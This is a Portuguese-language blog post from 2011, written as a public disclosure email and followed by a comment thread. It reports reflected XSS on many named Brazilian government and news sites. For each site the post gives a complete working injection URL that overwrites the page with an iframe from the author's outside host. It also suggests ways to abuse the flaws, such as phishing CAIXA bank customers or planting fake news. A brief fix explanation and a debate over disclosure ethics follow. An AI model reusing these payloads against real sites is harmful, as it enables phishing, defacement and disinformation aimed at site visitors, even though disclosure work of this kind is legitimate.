De: “Marcelo Jorge Vieira” <metal@mundobugado.org>
Para: “ANP Imprensa” <imprensa@anp.gov.br>, “CAIXA – Imprensa” <imprensa@caixa.gov.br>, “Jorge Fontes Hereda” <presidencia@caixa.gov.br>, “Joaquim Lima de Oliveira” <vitec@caixa.gov.br>, “CEB – Comunicação Social” <prcoe@ceb.com.br>, “Conselho de Consumidores da CEB” <conselho.ceb@ceb.com.br>, “Glaucius Oliva” <presidencia@cnpq.br>, “CNPq Ascom” <comunicacao@cnpq.br>, “Olímpio Cruz” <olimpio.cruz@agricultura.gov.br>, “MMA Ascom” <imprensa@agricultura.gov.br>, “Maria Lucia Muniz” <mlmuniz@mct.gov.br>, “MCT Ascom” <ascomt@mct.gov.br>, “Maristela Rangel Pinto” <cgm@cultura.gov.br>, “Nanan Catalão” <nanan.catalao@cultura.gov.br>, “Denise Mantovani” <denise.mantovani@mda.gov.br>, “MDA Ascom” <comunicacao.social@mda.gov.br>, “Nunzio Briguglio Filho” <nunzio@mec.gov.br>, “MEC Ascom” <imprensa@mec.gov.br>, “Ramiro Alves” <ramiro.alves@fazenda.gov.br>, “MF Ascom” <acs@fazenda.gov.br>, “Gerusa Barbosa” <gerusa.barbosa@mma.gov.br>, “MMA Ascom” <ascom@mma.gov.br>, “Antônio Carlos” <aclima@mme.gov.br> ,”MME Ascom” <ascom@mme.gov.br>, “Vanice Cioccari” <vanice.cioccari@mj.gov.br>, “MJ Ascom” <acs@mj.gov.br>, “PBH Ascom” <ascom@planejamento.mg.gov.br>, “Walter Carlos Auad Sotomayor” <walter.sotomayor@turismo.gov.br>, “Turismo Ascom” <imprensa@turismo.gov.br>, “Selvino Heck” <mobsocial@planalto.gov.br>, “Casa Civil da Presidência da República” <mprensaccivil@presidencia.gov.br>, “Benjamin Zymler” <min-bz@tcu.gov.br>, “Augusto Nardes” <min-an@tcu.gov.br>, “Estadão – Fale com” <falecom.estado@grupoestado.com.br>, “Estadão – Portal” <portal@grupoestado.com.br>, “Nelson Nunes” <nnunes@diariosp.com.br>, “Carlos Alencar” <carlos.alencar@diariosp.com.br>, “Ulisses Oliveira” <ulisses.oliveira@diariosp.com.br>, “Teodomiro Braga” <teodomiro@otempo.com.br>, “Fábio A. Santos” <tecnologia@otempo.com.br>, “Luiz Fernando Rocha” <luizrocha@otempo.com.br>, “Mylena Fiori” <mfiori@cartamaior.com.br>, “Carta Maior – Redação” <redacao@cartamaior.com.br>, “Terra – Abuse” <abuse@terra.com.br>, “Terra – Editorial” <editorial@terra.com.br>, “Roberto Borges Martins” <presidencia@redeminas.mg.gov.br>, “Hugo Teixeira” <hugoteixeira@redeminas.mg.gov.br>, “Franco Brostel Nunes Leal” <franco@redeminas.mg.gov.br>, “Luiz Silvério Pereira Meireles” <ditec@redeminas.mg.gov.br>, “Rodolfo Fernandes” <rodolfo@oglobo.com.br>, “Maria Fernanda Delmas” <fernanda.delmas@oglobo.com.br>, “Ascânio Seleme” <ascanio@oglobo.com.br>, “Folha Emergência” <folhaemergencia@uol.com.br>, “Folha Poder” <politica@uol.com.br>, “Ministério da Defesa” <imprensa@defesa.gov.br>, “Ministério da Defesa – Ascom” <ascom@defesa.gov.br>,
Olá,
No início do mês de Abril, eu descobri uma falha no site da ANP (Agência Nacional do Petróleo), que eu explorei para mudar a visualização do site, inserindo um formulário, um abaixo-assinado, onde um visitante poderia assinar seu nome como uma forma de protesto aos altos preços dos combustíveis.
Essa falha (primária) não altera o conteúdo do site, apenas muda a visualização e só funciona, se o usuário clicar em um link “batizado” com parâmetros específicos, como, por exemplo, o link abaixo usado para inserir o formulário no site da ANP: http://www.anp.gov.br/?q=<iframe src=’http://mundobugado.org/anp’> (o link não funciona mais, o pessoal da ANP já consertou a falha nesse ponto).
No meu blog, tem um relato explicando melhor o caso da ANP e o Mundo Bugado.
Como sou curioso, quis saber se outros sites também apresentavam a mesma falha. Minha mãe sempre diz: Quem procura, acha! E é claro que eu achei e não foram poucos.
.gov.br:
- ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis)
- Brazilian Tourism Portal (Ministério do Turismo)
- CAIXA (O banco que acredita nas pessoas)
- CEB (Companhia Energética de Brasília)
- Domínio Público (Ministério da Educação)
- Embratur (Ministério do Turismo)
- MF (Ministério da Fazenda)
- MINC (Ministério da Cultura
- MMA (Ministério do Meio Ambiente)
- MME (Ministério de Minas e Energia)
- MDA (Ministério do Desenvolvimento Agrário)
- MCT (Ministério da Ciência e Tecnologia)
- Portal da Transparência (Presidência)
- Plataforma Lattes (CNPq)
- SINDEC (Sistema Nacional de Informações de Defesa do Consumidor)
- TCU (Tribunal de Contas da União)
Jornal/TV:
- Estadão
- Carta Maior
- O TEMPO
- Diário de São Paulo
- Terra
- Rede Minas
O que eu quero com esse email?! Reportar essa falha, porque ela poderia ser explorada de várias maneiras:
- Uma pessoa mal intencionada poderia substituir a página inicial da CAIXA para “roubar” as contas de alguns clientes.
- Usar o site do Ministério da Cultura para falar mal da Ministra, uma vez que surgiram vários temas relacionados à ela nos últimos dias.
- Fazer mais uma campanha sobre os altos preços dos combustíveis no site da ANP.
- Usar o site do Ministério da Fazenda para falar que não é mais preciso declarar Imposto Renda.
- Publicar todas as falsas notícias no ESTADÃO, no Diário de São Paulo, no O Tempo, no Terra, na Carta Maior e na Rede Minas.
Com essa coleção de sites, é bem fácil criar uma rede de intrigas, verdades ou mentiras, como, por exemplo, “O brasil desistiu de sediar a copa”, “O brasil vai vender a Amazônia”, etc.
Por todos os motivos citados acima, essa falha é uma questão de Segurança Nacional.
Estou enviando e publicando esse email, porque não acredito no contato privado com suas instituições. A ANP demonstrou muito bem esse ponto ao não assumir a falha no site e no sistema de preços, e ainda fazer um comunicado sobre um endereço falso circulando na Internet e ao mesmo tempo retirar o sistema de consulta dos preços do ar.
Segue os links com as páginas alteradas, para confirmar
.gov.br:
* ANP (Agência Nacional do Petróleo, Gás Natural e Biocombustíveis) (Fixed! Corrigido!)
http://www.anp.gov.br/SITE/acao/estaaqui/?s1=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/anp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* Brazilian Tourism Portal (Ministério do Turismo)
http://www.braziltour.com/busca.html?search=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/braziltour/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220</code>%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E
* CAIXA (O banco que acredita nas pessoas)
http://www1.caixa.gov.br/busca/resultados.asp?q2=1&q1=%27%29;}%29;%3C/script%3E%3Ciframe%20src=%22http://metal.mundobugado.org/caixa/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C!--
* CEB (Companhia Energética de Brasília)
http://www.ceb.com.br/Ceb/aplicacoes/index.cfm?fuseaction=busca.realizarbusca&pesquisa=%3Ciframe%20src=%22http://metal.mundobugado.org/ceb/%22%20width=%221260%22%20height=%222500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E
* Domínio Público (Ministério da Educação) (Fixed! Corrigido!)
http://www.dominiopublico.gov.br/pesquisa/PesquisaAutorResultadoForm.do?letra=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/dominiopublico/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E
* Embratur (Ministério do Turismo)
http://www.embratur.gov.br/site/br/busca/busca.php?palavra=','')"><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/embratur/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* MF (Ministério da Fazenda) (Fixed! Corrigido!)
http://www.fazenda.gov.br/busca.asp?pesquisa=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/fazenda/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--
* MINC (Ministério da Cultura)
http://fale.cultura.gov.br/sisouvidor/login/formularioLogin.jsp?UsuarioInvalido=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/minc/" width="1260" height="9100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* MMA (Ministério do Meio Ambiente)
http://www.mma.gov.br/sitio/index.php?ido=conteudo.pesquisa&busca=%22%3C/h2%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/mma/\%22%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E
* MME (Ministério de Minas e Energia)
http://www.mme.gov.br/mme/buscaresult.html?field=content&index=indice_mme&query=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mme/%22%20width=%221260%22%20height=%223500%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E
* MDA (Ministério do Desenvolvimento Agrário)
http://mda.gov.br/sistemas/sistemasmda/index.php?msg=%3Cscript%3E$%28function%28%29{%20$%28%22body%22%29.empty%28%29.append%28%22%3Cbody%20style=%27margin:%200px%200px%27%3E%3Ciframe%20src=%27http://metal.mundobugado.org/mda/%27%20width=%271260%27%20height=%273200%27%20frameborder=%270%27%20marginheight=%270%27%20marginwidth=%270%27%20scrolling=%27no%27%3E%3C/body%3E%22%29%20}%29
* MCT (Ministério da Ciência e Tecnologia)
http://www.mct.gov.br/index.php?action=/html/objects/search_result&searchquery=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload%20=%20function%28%29%20{%20document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/mct/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%20}%3C/script%3E%3C!--
* Portal da Transparência (Presidência)
http://www.portaltransparencia.gov.br/despesasdiarias/resultado?consulta=rapida&periodoInicio="><script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/portaltransparencia/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
http://buscatextual.cnpq.br/buscatextual/busca.do?metodo=buscar&textoBusca=%3Cscript%3Ewindow.onload=function%28%29{document.write%28%22%3Cbody%20style=\%22margin:%200px%200px\%22%3E%3Ciframe%20src=\%22http://metal.mundobugado.org/cnpq\%22%20%20width=\%221260\%22%20height=\%222100\%22%20frameborder=\%220\%22%20marginheight=\%220\%22%20marginwidth=\%220\%22%20scrolling=\%22no\%22%3E%3C/body%3E%22%29}%3C/script%3E
* SINDEC (Sistema Nacional de Informações de Defesa do Consumidor) (Fixed! Corrigido!)
https://sindecbh.pbh.gov.br:444/sindecconsulta/?msg=%3C/td%3E%3C/tr%3E%3C/table%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/sindec/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--
* TCU (Tribunal de Contas da União)
https://login.tcu.gov.br/sso/jsp/login.jsp?site2pstoretoken=&p_submit_url=&p_cancel_url=&locale=%22%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Ftcu%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E
Jornal/TV:
* Estadão (Fixed! Corrigido!)
http://www.estadao.com.br/busca/%3C%2Ftitle%3E%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http:%2F%2Fmetal.mundobugado.org%2Festadao%22%20width=%221260%22%20height=%226000%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C%2Fbody%3E
http://cartamaior.com.br/templates/buscaExecutar.cfm?busca=%3C/title%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/cartamaior/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E%3C!--
* O TEMPO
http://www.otempo.com.br/videos/lista/?busca=%22%3E%3Cscript%3Ewindow.onload=function%28%29{document.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http://metal.mundobugado.org/otempo/%22%20width=%221260%22%20height=%222100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29}%3C/script%3E
http://www.diariosp.com.br/?id=%2Fbusca.php&ds_busca=<script>window.onload=function(){document.write('<body style="margin: 0px 0px"><iframe src="http://metal.mundobugado.org/diariosp/" width="1260" height="2100" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></body>')}</script>
* Terra (Fixed! Corrigido!)
http://buscador.terra.com.br/Default.aspx?source=Search&ca=s&query=%3C/title%3E%3Ciframe%20src=%22http://is.gd/lCgKDa%22%20width=1260%20height=2100%20frameborder=0%20scrolling=%22no%22%3E%3C!--
http://www.redeminas.mg.gov.br/search/node/%22%3E%3C/a%3E%3Cscript%3Ewindow.onload=function%28%29%7Bdocument.write%28%27%3Cbody%20style=%22margin:%200px%200px%22%3E%3Ciframe%20src=%22http%3A/%252Fmetal.mundobugado.org/redeminas/%22%20width=%221260%22%20height=%225100%22%20frameborder=%220%22%20marginheight=%220%22%20marginwidth=%220%22%20scrolling=%22no%22%3E%3C/body%3E%27%29%7D%3C/script%3E
O que é HTML Injection ou XSS (Cross-site scripting)?
HTML Injection é um tipo de vulnerabilidade encontrada normalmente em sistemas Web e é explorada com a inserção de código HTML/JavaScript nos parâmetros de um formulário, por exemplo. Não faz nenhuma mudança nos arquivos do servidor, apenas muda a visualização dos dados para o usuário.
O que é HTML?
“HTML (acrônimo para a expressão inglesa HyperText Markup Language, que significa Linguagem de Marcação de Hipertexto) é uma linguagem de marcação utilizada para produzir páginas na Web” — Wikipédia
O que é JavaScript?
JavaScript é uma linguagem de programação muito utilizada para produzir páginas na Web.
Como resolver?
Remover todas as tags HTML de todos os parâmetros. Para cada linguagem utilizada para produzir o site, existe uma forma de remover as tags: ASP, PHP, Python, Java.
——-
UPDATE 17/05/2011 – 20h34
ANP, Dominio Público e Terra corrigiram as "brechas".
UPDATE 18/05/2011 – 00h07
ESTADÃO corrigiu a "brecha".
UPDATE 18/05/2011 – 11h12
Caro Marcelo,
A falha mencionada foi corrigida, agradecemos a notificação.
Atenciosamente,
Lucas Betti Domingues
Equipe de Segurança Terra – Depto. de Abuse
abuse@terra.com.br
SAN – Servico de Atendimento Nacional
Fax: (51) 3287-9087
UPDATE 19/05/2011 – 11h33
SINDEC corrigiu a "brecha".
UPDATE 23/05/2011 – 23h32
A CAIXA corrigiu a brecha pela metade, mas já foi um avanço. Vocês podem testar aqui e aqui para comprovar que ainda existe a falha.
UPDATE 07/06/2011 – 17h08
O MF (Ministério da Fazenda) corrigiu a brecha. De um jeito tosco, mas corrigiu... agora eles retiram da busca os caracteres "<" e ">"
Havaian Dreams
Lamentável, conserto com “C”
metal
Olá Havaian Dream, obrigado pela correção.
ShitHappens
E você fez tudo isso pra que ?
Lammoh
ShitHappens, se promover em cima de uma falha, sair na imprensa, como se fosse ele que estivesse descoberto o bug que existe a uns 3 anos, só que está acabando de se queimar! Primeiro, você não foi contratado por nenhuma agencia de segurança, segundo a divulgação de vulnerabilidades especificas diretamente em site como você fez é crime, principalmente sites do governo. Você deverá responder por isso em breve, e não desonre o software livre com sua atitude inconsequente, anti-etica e imatura! Aqui, quer uma medalha por isso?!
Thiago Silva
Uma pergunta: “Lammoh”,eu não sei que lei ou advogado você consultou para dizer que o teor dessa publicação (e a publicação em si) é crime, poderia compartilhar? Pois os advogados que eu consultei (um deles, especialista em crime digital) me explicaram que não.
Ainda, eu, particularmente, acho que uma avaliação do custo dos portais governamentais produzidos (com meu, nosso dinheiro), junto com essas falhas levantadas pelo metal — falhas elementares, como qualquer profissional experiente atestaria — seria bastante interessante como material para questionar a relação entre gasto público e qualidade dos serviços produzidos e prestados.
Lammoh
Thiago Silva, basta um pouco de boa vontade para encontrar as leis no google. Seus advogados podem pegar o curriculo, rasgar e botar fogo, por que não aprenderam nada na universidade.
Atitude anti-etica, anti-profissional, imatura e inconsequente, de pessoa que quer aparecer na midia, você acha que divulgar isso dessa forma é etico e profissional? Coisa de lamer, muleque que faz isso, vai la no packetstormsecurity, securityfocus, espero que o Coordenador de TI do MJ onde você trabalha avalie sua conduta e sua atitude anti-etica e anti-profissional, você quer ganhar o que divulgando isso, reconhecimento, uma medalha? Sua atitude é patetica e imatura. Isso vai prejudicar o seu curriculo e seu nome! Toda ação tem uma reação igual e contraria. Atitude imatura!
Vou citar algumas leis:
Obtenção, transferência ou fornecimento não autorizado de dado ou informação
Art. 285-B. Obter ou transferir dado ou informação disponível em rede de computadores, dispositivo de comunicação ou sistema informatizado, sem autorização ou em desconformidade à autorização, do legítimo titular, quando exigida:
Pena reclusão, de 1 (um) a 3 (três) anos, e multa.
Parágrafo único. Se o dado ou informação obtida desautorizadamente é fornecida a terceiros, a pena é aumentada de um terço.
Art. 171
§ 2o Nas mesmas penas incorre quem:
Estelionato Eletrônico
VII difunde, por qualquer meio, código malicioso com intuito de facilitar ou permitir acesso indevido à rede de computadores, dispositivo de comunicação ou sistema informatizado:
§ 3o Se o agente se vale de nome falso ou da utilização de identidade de terceiros para a prática do crime do inciso VII do § 2o deste artigo, a pena é aumentada de sexta parte.
metal
ShitHappens, fiz porque sou curioso. Fiz pra mim mesmo.
metal
Lammoh, não estou querendo me promover através dessas falhas, porque segurança não é a minha área, e essa falha é tão primária que qualquer um com uma noção básica de HTML poderia explorar. A diferença aqui é que não é um site isolado, e sim, vários sites apresentando a mesma falha.
Você esta falando de um site ou de todos, você poderia apontar onde foi publicado, já que essa falha tem 3 anos?
Desde quando eu preciso ser contratado por empresas de segurança para apontar falhas em sites? Como falei, não acredito no contato privado com as instituições, por isso divulguei aqui no blog por se tratar de instituições públicas elas devem agir com transparência.
Desonrar o software livre? Não fala besteira, o que tem uma coisa com a outra? Quem esta sendo imaturo é você, parece um bebê chorão.
Sim, quero ganhar uma medalha, que inclusive já ganhei… Pode chamar essa medalha de dever cumprido, de curiosidade, etc.
Lammoh
Se fez para você mesmo, para quer publicar, para que mandar para imprensa? Seu fundamento é tão vazio que se fosse para você mesmo, você não teria divulgado para o publico, você não é programador, é muleque, anti-etico e anti-profissional, uma coisa é você ter mandado para as instituições, ok, isso é dever cumprido e é uma atitude MADURA, HONRAVEL, DIGNA, PROFISSIONAL E ETICA, agora publicar na internet é querer aparecer, está sem o que fazer? e ainda fica colocando foto de GNU nos sites, como se fosse um defacer, muleque, em vez de estimular o software livre com algo positivo, vai arrumar um emprego de verdade e faça algo produtivo e positivo sem desmerecer o trabalho de outra pessoa. Dever cumprido seria você ter um PINGO DE ETICA ter enviado apenas para os responsaveis. Não é por que você não acredita em contato privado que deve divulgar as falhas dessa forma. Essa sua linha de pensamento é igual dizer “Não acredito na justiça então vou fazer justiça com as proprias mãos”. Acho que você deveria usar seu tempo la para melhorar o debian, em vez de ficar querendo aparecer em cima dos outros.
Não pense que você está acima da lei e pode fazer o que quiser e como quiser!
Sua batata está esquentando!
metal
Lammoh, porque tanta preocupação com o meu currículo e o meu nome?! Você poderia começar usando seu nome verdadeiro?
Vou te pedir pra não ser um troll e não usar o espaço de comentários do blog pra ficar falando merda, se for escrever, escreve algo objetivo.
Lincoln de Sousa
Iniciativa maravilhosa, verdadeiro exemplo de ativismo hacker. Além de informar ao usuário desses sites que suas informações, sua privacidade e, portanto, sua segurança digital estão em perigo, deixa clara a situação preocupante do tratamento que o governo e várias empresas dão à qualidade e segurança de seus portais.
Só quero fazer uma pergunta ai pro nosso amigo discordante, o Lammoh. Se você visse um caso de mau uso de dinheiro público numa esfera não tecnológica, você não delataria? Se fosse um policial fazendo vista grossa a alguém sendo assaltado, ou um médico do SUS que não quis prestar assistência a um paciente, estaria tudo bem?
Estamos tratando de um assunto importante, mas muito abrangente, a segurança em meio digital. Entretanto, sugiro que tente fazer uma reflexão sobre o recorte que o Metal propôs a fazer um levantamento específico de sites .gov.
Parabéns.
DemonioAndaSobreAguas
aposto que Lammoh eh um programador de MERDA.
fica putinho aí ao invés de corrigir. Amigão, o brasil eh um grande lixo. Nao vem esfregar ética na minha cara, não. Leis de merda, feitas por merdas que nao tem a menor noção.
Mandou bem, metal.
L33t0...
Lincoln de Souza, ativismo hacker, putz, tenho que ler isso! Eu aplaudiria se isso fosse feito com ETICA e PROFISSIONALISMO. O que não é o caso, as evidências comprovam. Agora está ai, o lammoh divulgando e dando dica para estimular os estelionatarios enviar email com golpes.
O problema é que não tem limite, principalmente o pseudo-profissional que esta divulgando isso, quer aparecer, sair em revista H4ck3r, querer se auto-promover e ganhar atenção!
Uma coisa é divulgar aos responsaveis, outra é divulgar publicamente, essa exposição desnecessaria, suas analogias são infundadas e incoerentes, continuo ressaltando que a ação foi abominavel do ponto de vista ETICO E PROFISSIONAL, mesmo se tratando de uma falha sutil generalizada em varios portais. Não estou justificando um erro com outro, concordo que devemos buscar sempre a qualidade, e não podemos generalizar o trabalho realizado por uma equipe de desenvolvimento por uma falha, primeiro por que ninguem te instituiu juiz de nada de todos esses portais, então se coloque no seu lugar. Mas expor todo um trabalho por causa de uma falha dessa, condenar um projeto todo é uma atitude que reflete uma opinião de um profissional imaturo e anti-etico, que precisa aprender muito a viver e principalmente a trabalhar! Nenhum profissional maduro e etico teria uma atitude tão imatura e infantil como essa! Principalmente por que todos sabemos que estamos sujeitos a falhas e não existe sistema 100% seguro.
DemonioAndaSobreAguas, nem irei te responder por que não rebaixarei ao nivel de suas colocações hipocritas e infantis, não tenho mais idade para isso! Você não merece nem atenção!
yaso
Ei, l33t0:
Tanto ódio no coração porque?
Começo a desconfiar que você, no mínimo, é responsável por uma das falhas.
Se for, arrumae esse negócio e aprenda a fazer as coisas direito. Se não for,
ajuda a divulgar, porque mesmo com a atitude "imatura e infantil" do Metal de
divulgar na imprensa (mais precisamente no blog dele, no twitter e identi.ca),
a galera tá meio LENTA na correção dos bugs, que é o mais importante dessa
conversa toda e ninguem fez nada ainda…
Tó aqui ó pra vc ler, sobre ativismo hacker.
http://hacktivism-is-unbound.tumblr.com/
Quem sabe depois disso tudo vc venha a se identificar… Seria mais ÉTICO E PROFISSIONAL.
Gustavo Noronha
Lammoth, nenhum dos artigos que você citou cobrem o caso em questão; Portanto, mesmo que a lei que você citou estivesse em vigor acredito que seria muito fácil para o metal ganhar uma eventual causa que fosse ajuizada contra ele, dado que ele não “obteve dados” sem autorização e muito menos disseminou código malicioso com o intuito de facilitar “acesso indevido a rede de computadores”.
Acontece que a lei que você citou sequer está em vigor, o que denuncia sua total e irrestrita incompetência nessa questão. Os artigos que você citou são da famosa “Lei Azeredo”, também conhecida como AI5 Digital, que felizmente não foi aprovada pelo congresso nacional.
Mas brasileiro é assim mesmo. Não pode expor erros, não pode criticar, tem que ser tudo por baixo dos panos (quentes!), senão é anti-ético, é anti-brasileiro. Se com exposição pública a galera já demora tanto pra arrumar os erros imagina avisando só os responsáveis? O melhor mesmo seria deixar tudo como está, né?
Hacko Debiano
Gustavo Noronha, você que se intitula “um hacker debiano que mora num lugar chamado mundo”! Piada! Continue ai com o showzinho! Vamos ver até aonde vai!
Não irei perder tempo postando algo aqui! Interprete a lei da forma que você quiser, conforme as leis que citei ali em cima, existe pena para estelionatarios e pessoas que usam o meio digital para praticar ou divulgar formas de enganar outras pessoas, que é o caso! O Marcelo trabalha dando consultoria no Ministerio da Justiça e sabe como funcionam! Tudo isso começou com uma forma um protesto ilicito no portal da ANP!
Enfim, acho que já rendeu o que tinha que render esse papo! Agora aproveite seus 15 minutos de fama! Vamos ver até onde vai chegar! Agora vai juntar um grupinho de debianos arrogantes querendo aparecer! Parabens, os caras do debian são rakers! Aplausos! Etica profissional ZERO! \o/
Gustavo Noronha
Anônimo: segundo o artigo xxyy, o metal vai pra cadeia
Eu: cara, a lei não passou, não está em vigor
Anônimo: conforme a lei que eu citei, o metal vai pra cadeia
Eu: que parte de “a lei não está em vigor” você não entendeu?
Anônimo: interprete a lei como quiser! Conforme a lei que eu citei acima… o metal vai pra cadeia.
Eu: *facepalm*
Anônimo: arrogantes, anti-éticos, bobos, feios e chatos… manhê, os hacko debiano tão balançando a cabeça e rindo de mim! *snif*
Ricardo Bezerra
Eu também ficaria muito chateado se alguém colocasse uma falha de um sistema que eu sou responsável na internet, principalmente se eu ganhasse muito e não tivesse fazendo nada direito do que sou pago pra fazer, mas, antes eu resolveria o problema. Esse cara é divertido, alegrou o início do meu domingo, melhor que a Formula 1, sem falar em leis que nem foram aprovadas e talvez nem sejam, os que forem contrários a ela por favor http://www.petitiononline.com/veto2008/petition.html estão dando mais ainda um toque de comedia. Hehe
Lincoln de Sousa
L33t0, tenho uma dúvida. A yaso ressaltou que, mesmo com a divulgação das falhas, várias delas ainda não foram corrigidas. Será que se as mesmas não tivessem sido divulgadas, pelo menos seria corrigida?
Não sei qualé a sua história, mas fico assustado com o comentário do Ricardo Bezerra, pois deixa clara a “pessoalidade” com que o assunto é tratado. Se falhas como essas não são publicadas, só pessoas com má intenção vão explorá-las. Se elas são conhecidas por todos, qualquer um pode se precaver e cobrar a correção.
Sobre hacker ativismo, sim você precisa dar uma lida. Aproveita pra ler alguma coisa sobre ética e profissionalismo também. Todo mundo que comentou “a favor” da causa se identificou. Já o time “do contra” não linkou nenhuma referência pessoal. Um imbecil teve até o trabalho de clicar no blog do Kov e ficar tirando ondinha com a cara dele — Funny — bota a sua cara na roda e vamos continuar a conversa, q tal?
2600
Lincoln. Não vou ficar me expondo, por que odeio esse tipo de exposição, primeiro por que considero pouco profissional esse bate-boca, segundo por que é perda de tempo para mim tentar conscientizar vocês de alguma coisa, vocês já tem a opinião e visão do que é certo e do que errado segundo sua perspectiva etica e profissional na informatica com base nas suas proprias experiencias, quando vocês possuirem mais caminhada profissional, maturidade, TALVEZ vocês vão entender o que estou falando! Ou vão morrer sem saber! Devemos saber até onde vai nosso papel de cidadão, o papel seu era de informar os responsaveis e ponto final, pode dormir com a consciencia limpa por que você já fez o que era certa, agora querer expor, e promovendo para imprensa, fazendo estardalhaço, é uma atitude detestavel, anti-etica, anti-profissional, considero fruto de uma falta de maturidade profissional, seriedade no que faz, respeito! Mas aqui no Brasil, pais com povo que se acha mais esperto que os outros, (mas é o mais tolo), valores como etica e profissionalismo não é algo que se leva em importancia! Enfim, o espaço de comentarios é democratico, fica registrado a minha opinião como profissional. Coloquei minha visão, argumentei e acho que já basta né, essa discursãozinha já rendeu até demais, além do que deveria render.
Amandinha
Poxa, Metal. Hoje foi a primeira vez que tive tempo de ler os seus posts, mas acompanhei os do identi.ca/twitter. Foi honrosa sua atuação. É muito bacana ver iniciativas como esta! Encontrar erros e divulgá-los a quem possa corrigí-los.
E é muito triste ver que poucas destas foram ouvidas. Ainda mais triste ver que muito do nosso dinheiro é que está sendo desperdiçado, por erros cujas correções são tão simples e cujas consequências
E quanto a estes comentários citando ética, profissionalismo e etc, estes, felizmente, perdem toda a razão ao citar leis que não estão em vigor, em posts com erros crassos de português. 🙂
E ah! aproveito para agradecer, viu?! Sou analista de testes e nunca tinha utilizado destes artifícios no meu trabalho. Penso agora, que vários dos sistemas em que trabalhei, consequentemente, podem ter estes bugs e muitos por meu amadorismo. Mais um ítem pro meu checklist!
Valeu!
Beijo
Viriclus
Td bem, chega, so quero saber, como faco pra fechar essa brecha? help me 🙂
Gustavo Noronha Silva
Viriclus, o conserto pra isso é entender e aplicar 2 princípios: 1) toda a entrada de usuário é por definição não-confiável e 2) nunca se deve interpretar dados não confiáveis como código
O que acontece nesses casos todos é que o que o usuário digita no campo de busca (ou passa diretamente pela URL) é código HTML que a aplicação web simplesmente inclui como parte do HTML que envia para o navegador sem nenhum tratamento.
Um conserto simples para isso é fazer o que a gente chama de "escape" na entrada que o usuário der; ou seja, transformar os caracteres especiais como < e > em entidades, como > e <, que vão ser interpretadas corretamente pelo navegador, que vai então exibí-las como texto simples e não processá-las como se fosse HTML.
